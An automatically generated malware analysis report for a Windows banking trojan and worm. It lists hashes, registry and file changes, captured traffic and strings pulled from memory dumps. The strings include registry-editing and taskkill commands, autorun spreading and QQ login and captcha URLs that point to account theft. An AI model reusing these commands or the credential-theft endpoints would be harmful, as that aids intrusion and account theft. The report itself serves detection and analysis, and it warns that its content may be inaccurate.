Trojan.Generic.13054185_a99b5c29fc

Susp_Dropper (Kaspersky), Trojan.Generic.13054185 (B) (Emsisoft), Trojan.Generic.13054185 (AdAware), GenericEmailWorm.YR, GenericAutorunWorm.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS) Beh...
Blog rating:4.6 out of5 with9 ratings

Trojan.Generic.13054185_a99b5c29fc

by malwarelabrobot on April 14th, 2015 in Malware Descriptions.

Susp_Dropper (Kaspersky), Trojan.Generic.13054185 (B) (Emsisoft), Trojan.Generic.13054185 (AdAware), GenericEmailWorm.YR, GenericAutorunWorm.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Worm, EmailWorm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a99b5c29fcb118c05ff60b33f0c09420
SHA1: c32da3a6266b26239920859f443ccd19af2c6965
SHA256: e71f0772c47a3fdb0b212763935266f212fa0c814208280c6ebee401f6390d85
SSDeep: 196608:t/gEVrYKTjQ8OlooqMcDmWrryDYMKibIRnQp2jf/rNpalf79J1ZpL0wQSMUE:t4EK6oqMG/y0IMR1jn5O79J1WUE
Size: 9576448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv211d, ASPackv10804, MSLRHv01, MSLRHv02, UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-14 13:30:16
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1320

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
DBWinMutex
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (393 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)

Registry activity

The process %original file name%.exe:1320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 09 D2 FC 3F 96 AA 1A 0A D4 39 DD 14 98 82 FF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name:
Product Name: ?????Beta5.0.7
Product Version: 5.0.10.14
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.0.10.14
File Description: ???????
Comments: ?????????
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 14204928 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 14209024 9539584 9536000 5.50972 4daa35f09cc9e3890b742f946c8305d9
.rsrc 23748608 24576 23552 3.34503 d146a9458ffe69e984e56ac02d0ba8ff
. 23773184 12288 12288 3.07125 77c60528ba6948084d5ed27d7f1be690

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hi.n.shifen.com/bye_1994/item/2cd7fd48b2acd619fa8960f9
hxxp://www.a.shifen.com/
hxxp://hi.baidu.com/bye_1994/item/2cd7fd48b2acd619fa8960f9 180.76.2.41
hxxp://www.baidu.com/ 180.76.3.151


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET / HTTP/1.1
User-Agent: test
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=E79C0C3B877BB9CC6D3B35945901BAD0:FG=1


HTTP/1.1 200 OK
Date: Mon, 13 Apr 2015 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BIDUPSID=E79C0C3B877BB9CC6D3B35945901BAD0; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=13371_5457_1468_13151_13075_12825_12952_12868_13322_12691_13410_12722_12735_13439_13085_13478_13324_13201_12836_13490_13161_8498_10632; path=/; domain=.baidu.com
Cache-Control: private
Cxy_all: baidu c1b380a994a04eb6e728ba871798a9a1
Expires: Mon, 13 Apr 2015 15:35:16 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xbbac79fa0006083a
BDUSERID: 0
15687..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index"
id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET /bye_1994/item/2cd7fd48b2acd619fa8960f9 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hXXp://hi.baidu.com/bye_1994/item/2cd7fd48b2acd619fa8960f9
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hi.baidu.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Set-Cookie: BAIDUID=E79C0C3B877BB9CC6D3B35945901BAD0:FG=1; max-age=31536000; expires=Tue, 12-Apr-16 15:35:44 GMT; domain=.baidu.com; path=/; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Location: hXXp://hi.baidu.com/com/error
Set-Cookie: CANAL=101; path=/; domain=.hi.baidu.com
Content-type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Mon, 13 Apr 2015 15:35:44 GMT
Server: apache
f9f..               <!DOCTYPE html><html  id="customDoc">&
lt;!--STATUS OK--> <head> <meta http-equiv=Content-Type co
ntent="text/html; charset=utf-8"> <title> Bye_1994........._.
...........</title> <link rel="shortcut icon" href="hXXp://hi
.bdimg.com/static/qbase/img/mod/16_favicon.ico?v=116ba471.ico" type=im
age/x-icon> <meta name=keywords content=","> <meta name=
description content=","><script>window.wpo={start:new Date*1,
pid:109,page:'qing'}</script><!--[if IE]><script type="
text/javascript">(function(){var e="abbr,article,aside,audio,canvas
,datalist,details,dialog,eventsource,figure,footer,header,hgroup,mark,
menu,meter,nav,output,progress,section,time,video".split(","),t=e.leng
th;while(t--)document.createElement(e[t])})();</script><![end
if]--><script>window.qDomain={"qing":"hXXp://hi.baidu.com","s
tatic":"hXXp://hi.bdimg.com","passport":"hXXps://passport.baidu.com","
portrait":"hXXp://tx.bdimg.com","hiup":"hXXp://hi.baidu.com","photo":"
hXXp://hiphotos.baidu.com","message":"hXXp://msg.baidu.com","friend":"
hXXp://frd.baidu.com","mp3":"hXXp://mp3.baidu.com","ting":"hXXp://ting
.baidu.com","image":"hXXp://img.baidu.com","qup":"hXXp://upload.hi.bai
du.com","www":"hXXp://VVV.baidu.com"};window.qUserInfo={"userName":"By
e_1994","nickname":"Bye_1994","portrait":"f5356279655f31393934602b","q
ingUrl":"\/bye_1994","spaceName":"Bye_1994.........","right":"0","avat
arStatus":"0","flagNeedInvite":"0","flagNotInvited":"0","version":

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1320_rwx_00401000_016A5000:

t%SVh
t$(SSh
|$D.tm
.PQSh
~%UVW
u$SShe
user32.dll
kernel32.dll
wininet.dll
ole32.dll
User32.dll
gdiplus.dll
GdiPlus.dll
Kernel32.dll
advapi32.dll
WinINet.dll
shlwapi.dll
OLEACC.DLL
shdocvw.dll
gdi32.dll
msimg32.dll
comctl32.dll
COMCTL32.DLL
atl.dll
shell32.dll
psapi.dll
Ole32.dll
Gdiplus.dll
Gdi32.dll
UxTheme.dll
imm32.dll
Psapi.dll
ntdll.dll
ShellExecuteA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
UnregisterHotKey
RegisterHotKey
EnumWindows
GdiplusShutdown
UnhookWindowsHookEx
MsgWaitForMultipleObjects
HttpAddRequestHeadersA
GetAsyncKeyState
SetWindowsHookExA
GdipSetPenLineJoin
GdipGetPenLineJoin
GdipSetStringFormatHotkeyPrefix
GdipGetStringFormatHotkeyPrefix
GetKeyState
RegCreateKeyA
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
GdipSetImageAttributesColorKeys
EnumChildWindows
{B6F7542F-B8FE-46a8-9605-98856A687097}
{A0005538-9391-4dd9-B4D6-8EB7B9360F08}
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
FtpAssistant
WebBrowser
gpedit.msc
VVV.meitu.com
nQ%S(2
v.xL6
m.iI-w
x,.AO
Gaexesuo3y
N.Omg8
RM'.IS
(^.Vir
[.py'
{H
.8|f.Xw7^
UrL~]
j.Jqv
N...dv
Tf%UV
<W%%S
<f.ug))
c9I.ek4
}=ikm,%d
HKEY_CLASSES_ROOT\.bat
CmdFile
cmdfile\shell\open\command\
HKEY_CLASSES_ROOT\.cmd
HKEY_CLASSES_ROOT\.com
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.scr
HKEY_CLASSES_ROOT\.pif
HKEY_CLASSES_ROOT\.txt
NOTEPAD.EXE %1
HKEY_CLASSES_ROOT\.ini
HKEY_CLASSES_ROOT\.reg
regedit.exe "%1"
HKEY_CLASSES_ROOT\.inf
HKEY_CLASSES_ROOT\.hlp
winhlp32.exe %1
chm.file\shell\open\command\
HKEY_CLASSES_ROOT\.chm
hh.exe" %1
HKEY_CLASSES_ROOT\.vbs
WScript.exe "%1" %*
HKEY_CLASSES_ROOT\.js
8,hXXp://jq.qq.com/?_wv=1027&k=Llkwtw
iexplore.exe
2014:02:25 12:33:42
McRt
'M.jR[
Pe%XY(
CMD.bat
hXXp://qzone-music.qq.com/fcg-bin/cgi_playlist_xml.fcg?json=1&uin=
xsinger_name:.(.*?).,xsong_url
xsong_url:'(.*?)',xsong_dissid
hXXp://openapi.baidu.com/public/2.0/bmt/translate?client_id=x4Hkv669BuTewPgq6I9w8YcU&q=
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
hXXp://show.qq.com/qqshow_close_step1.html
hXXp://hi.baidu.com/aumcc/item/8275b3c49c03d826ef46655e
2"hXXp://ns.adobe.com/xap/1.0/
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/">
<xmp:CreatorTool>Adobe Fireworks CS6 (Windows)</xmp:CreatorTool>
xmlns:dc="hXXp://purl.org/dc/elements/1.1/">
]Tcs
p%c-{
(ÿr
.eTYc
e%0xH
2.pLM
j.pHU
j.zJ}
%8Y.nC
.tV2M
.UW<6&E
D@.Vs
42|CMD
89|FTP
mima.exe
.rsrc
.guruX
.Dorc
 }.Tz
B.kdeQ
B.WV8
)O.bBQ
o50%u
v6C!.UI
[|fJ.Pt"x
-M}M23
Q1.yR$!
mNZ%c
Ü%Y
%X!yIb
5Gm%f
)-3}]
%X13F2
1b%:%F
=_S%S
UÚe
g.fQwb
.tn%?x
05.oT
C:%S J
f.qy/
gv.od
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
:hXXp://VVV.tmd.la
M%uBc
K!.Zg
\jt.bat
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /d "C:\Windows\system32\shell32.dll,49" /t reg_sz /f
taskkill /f /im explorer.exe
attrib -s -r -h "%userprofile%\Local Settings\Application Data\iconcache.db"
del "%userprofile%\Local Settings\Application Data\iconcache.db" /f /q
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /d "C:\Windows\system32\imageres.dll,196" /t reg_sz /f
attrib -s -r -h "%userprofile%\AppData\Local\iconcache.db"
del "%userprofile%\AppData\Local\iconcache.db" /f /q
hXXp://game.sl.qq.com/index.shtml
qq.php?verify----
hXXp://iphone.xmqipai.com/
Microsoft.XMLHTTP
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)
pkey='
yzmkey='
yzmkey2='
2%S<<PpD
\.PT\l
.xf:|-
H.txL
]j.dQ
$4%S2%H\2%S2p
G\\%SHK
.Pej7o
D`.HN
UWSSHh
@@DlJ.Wp
e.XWT
x`>x.ht
.Be$>;
H .at
s.Khu
Ny.odS8l
E%upm
m%fM;O
c.SFPO
.xt %
u.HT i
.IY\p,
"~`.tCD
.uP.b
27C7b2.TO|
C.kwFt
C.DLL1
;B.add
8HKEY_CURRENT_USER\S
~o%9S
O.OPP
LL@.9y.XXpRy.9yR
%*.*f I64
&HK.ix
CmdT
#Q.HLP'
.MSVCRTC
8X.PAVC@@
(&07-034/)7
87''''6543
4.FZz
&.Gm!5
zcÁ
%.hs#inclv
//oGl.chs\
KillQQLiveAD\Config.ini
QQLiveExternal.exe
hXXp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?get_nick=1&uins=
hXXp://VVV.baidu.com/s?wd=
\Tencent\QQ\Skins\Skin.ini
msg_wnd
09/27/12
n@Member.exe
%fs^x
%D,R5
wB.YF
XxX%C
K]q}
XULr.%f
^.GY?I
;%u#~6xb
O.Gun
q \
HW.%d
;<%5U
|H%Cv
G.TYjbIl
9.GViI
x[9.bH
Uz#z5%U
vz,.ALF
g.Ayi
hXXp://ctc.qzs.qq.com/qzone/web/qzone_submit_close.html
hXXp://VVV.wenjuan.com/s/UBZBF3
QQ.exe
hXXp://tieba.baidu.com/f/search/ures?kw=
hXXp://tieba.baidu.com/f/search/res?isnew=1&kw=
4@hXXp://tieba.baidu.com
\I18N\2052\StringBundle.xml
<String id="MSGFILE_IN_SHARE">
\bin\MedalWall.dll
.text
`.rdata
@.data
@.reloc
RegOpenKeyTransactedW
U%.8X%s
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
R:\TempView\Output\BinFinal\MedalWall.pdb
?GetExeDir@Sys@Util@@YA?AVCTXStringW@@XZ
?IsInitAsyncMsgLoop@Misc@Util@@YAHXZ
Common.dll
GF.dll
RenderService.dll
AsyncTask.dll
KERNEL32.dll
RegOpenKeyExW
ShellExecuteExW
ATL100.DLL
SHLWAPI.dll
MSVCP100.dll
MSVCR100.dll
_malloc_crt
_amsg_exit
_crt_debugger_hook
MedalWall.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>*>0>=>_>
=#=/=@=}=
0!1)161}1
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
\bin\QQ.exe
Set p = CreateObject("QQCPHelper.CPAdder")
p.PutRSInfo uin, 65541, strRSPrompt, strRSParam
p.PutRSInfo uin, 65572, strRSPrompt, strRSParam
p.PutRSInfo uin, 65576, strRSPrompt, strRSParam
p.PutRSInfo uin, 65567, strRSPrompt, strRSParam
p.PutRSInfo uin, 65549, strRSPrompt, strRSParam
p.PutRSInfo uin, 65570, strRSPrompt, strRSParam
p.PutRSInfo uin, 65585, strRSPrompt, strRSParam
p.PutRSInfo uin, 65578, strRSPrompt, strRSParam
p.PutRSInfo uin, 65582, strRSPrompt, strRSParam
p.PutRSInfo uin, 65583, strRSPrompt, strRSParam
p.PutRSInfo uin, 65566, strRSPrompt, strRSParam
p.PutRSInfo uin, 65571, strRSPrompt, strRSParam
p.PutRSInfo uin, 65574, strRSPrompt, strRSParam
p.PutRSInfo uin, 65579, strRSPrompt, strRSParam
p.PutRSInfo uin, 65588, strRSPrompt, strRSParam
p.PutRSInfo uin, 65568, strRSPrompt, strRSParam
p.PutRSInfo uin, 65575, strRSPrompt, strRSParam
p.PutRSInfo uin, 65563, strRSPrompt, strRSParam
p.PutRSInfo uin, 65562, strRSPrompt, strRSParam
p.PutRSInfo uin, 65561, strRSPrompt, strRSParam
2121212
6161616
hXXp://hi.baidu.com/aumcc/item/e495c6d240e6ac47fa57685e
(*.txt)|*.txt
hXXp://VVV.liantu.com/api.php?fg=
PNWinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
hXXp://tieba.baidu.com/f/like/manage/list?kw=
" src="hXXp://tb.himg.baidu.com/sys/portrait/item/
&CMD=
Login
Server_Msg
VER=1.4&CON=1&CMD=CLTMSG&SEQ=
EG.Kq
.AkB|
(*.*)|*.*
0'-?2&@=["
1681459862
hXXp://shaihao.com/gujia/
hXXp://captcha.qq.com/getimage?aid=8000103&r=0.6985118262896894
c:\video.downlist
D:\apple
QQLive.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /f
src="hXXp://imtranslator.com/sockets/tts.asp?
logonui.exe
Windows XP
DefaultPassword
hXXp://pt.3g.qq.com/g/s?aid=nLogin
&loginurl=
hXXp://pt.3g.qq.com/reg?sid=
hXXp://pt.3g.qq.com/handleLogin?sid=
&loginType=1&loginsubmit=登录
login_url=http://pt.3g.qq.com/s?aid=nLogin&sidtype=1&nopre=0&q_from=&loginTitle=手机腾讯网&bid=0&qq=
hXXp://pt.3g.qq.com/s?aid=nLogin3gqq&auto=1&g_f=1796&sid=
hXXp://pt.3g.qq.com/s?aid=nLogin3gqqbysid&r=
&auto=1&loginType=1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
hXXp://q16.3g.qq.com/g/s?sid=
hXXp://captcha.qq.com/getimage?aid=15000101&uin=
:\autorun.inf
$$$((()))***((('''###
"""(((...222333000)))$$$
!!!'''---333888999888555000***&&&"""
"""'''   000444666555333000...---...///---)))&&&!!!
!!!###$$$###!!!
!!!&&&***...000...***&&&!!!
:::///$$$
777   ###
;;;000(((%%%(((///:::
!!!)))666
%%"2CCC
^^^---(((...:::
""")))444
"""   777
"""***555
333(((!!!
666***!!!
777***!!!
"""///@@@}}}
tttaaaSSSHHH???;;;???III
!!!(((333
666   ###
!!!(((222
555***"""
&&&...RRRrrrxxx}}}
"""---<<<{{{
999,,,"""
###...;;;
$$$...lll
<<<///$$$
???222'''
777,,,"""
$$$   222888999444...'''
"""'''***---,,,)))&&&!!!
"""###"""!!!
%%%***000111000,,,'''"""
###&&&'''&&&###
hXXp://qqspace-av.qq.com/
D:\apple\
\Res.rdb
\Themes\Default.rdb
3@hXXp://VVV.socialland.net/sendsms.php
hXXp://VVV.google.com/recaptcha/api/challenge?k=
hXXp://VVV.google.com/recaptcha/api/image?c=
/favicon.ico
a1.jpg
time-a.timefreq.bldrdoc.gov
time-b.timefreq.bldrdoc.gov
time-c.timefreq.bldrdoc.gov
time-a.nist.gov
time-b.nist.gov
>>c:\temp.txt
cmd /c
c:\temp.txt
\LOVE.htm
hXXp://VVV.liyechong.com/xiazai/tiebasixinji.html
&pt_uistyle=23&low_login_enable=1&low_login_hour=720&aid=46000101&daid=6&
&pt_rsa=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2052&action=3-53-1407591192390&js_ver=10088&js_type=1&login_sig=
hXXps://ssl.ptlogin2.qq.com/login?u=
hXXp://k.t.qq.com/k/我与QQ的故事
op=1&apiType=8&apiHost=http://api.t.qq.com&g_tk=
hXXp://api.t.qq.com/asyn/qqage.php
mrbin\RAR.exe
SSShT
?%u)h
;%%0%du
dos.sfx
rarfiles.lst
=%%
%d.d
default.sfx
rar.log
rar.ini
[%c]%s
d:d:d %s
-------- - %s %d
%.*s(%d)%s
rtmp%d
SHFileOperationW
%s - %s
%c:\*
"s %s
%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c
"s %8s %4s
%d.%d
%c....B
%8s %8s
%5lu s %8s =%%
WaitForMultipleObjects failed, error %d
rar.lng
*.rev
%%s%%0Ý_%%0Ý_%%0Ý.rev
%%s%%0Ý.rev
rarlng.dll
%s%c%s
SMTP:
MAPI32.DLL
u-u-u u:u
u-u-%u u:u
Z2fQ`.%s%s1
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
d:\Projects\WinRAR\rar\build\rar32\Release\RAR.pdb
GetCPInfo
ExitWindowsEx
SHFileOperationA
GetConsoleOutputCP
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
4 4$4(4,4
7$8*838:8
2,3034383<3@3|3=4
mrbin\URL.jpg
Adobe Photoshop CS6 (Windows)
2012:12:23 23:25:04
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2012-11-25T22:01:04 08:00" xmp:MetadataDate="2012-12-23T23:25:04 08:00" xmp:ModifyDate="2012-12-23T23:25:04 08:00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:5E4AFA270E4DE211BE13DB00DCC3E507" 